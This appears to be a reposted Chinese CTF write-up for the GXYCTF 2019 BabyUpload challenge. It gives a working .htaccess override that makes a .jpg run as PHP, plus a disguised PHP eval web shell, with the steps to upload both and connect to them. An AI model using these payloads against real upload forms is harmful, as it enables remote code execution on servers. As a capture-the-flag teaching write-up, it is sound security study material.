[GXYCTF 2019]BabyUpload
2024-01-08 10:34:58
[GXYCTF 2019]BabyUpload wp
页面内容:
在上传文件时,发现 png 后缀名都被过滤了,只能用 jpg ;
此外过滤了 PHP 文件的标志:<?php ,<? ;
后缀名不能带有 ph ;
fuzz 了一下,发现后缀名 .htaccess 没被过滤。
后面的我没测了,直接给出我用的文件内容:
htaccess.jpg 文件内容:
<FilesMatch "eval.jpg">
SetHandler application/x-httpd-php
AddHandler php5-script .jpg
</FilesMatch>
设置同一目录下的 eval.jpg 被当作 PHP 代码执行。
eval.jpg 文件内容:
BM
<script language="php">@eval($_POST['shell']);</script>
关于这段代码的解释可以去看:
解题步骤:
上传顺序随意,htaccess.jpg 文件在上传时要抓包,将文件名改为 .htaccess(必须一模一样):
eval.jpg 文件直接上传。
路径中的那一大串字符看似随机,其实每个文件都是一样的,目录不变,这样 .htaccess 才会发挥作用。
直接用蚁剑去连 eval.jpg 文件的路径,flag 在根目录下:
文章来源:https://blog.csdn.net/m0_73612768/article/details/135378786
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:veading@qq.com进行投诉反馈,一经查实,立即删除!
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:veading@qq.com进行投诉反馈,一经查实,立即删除!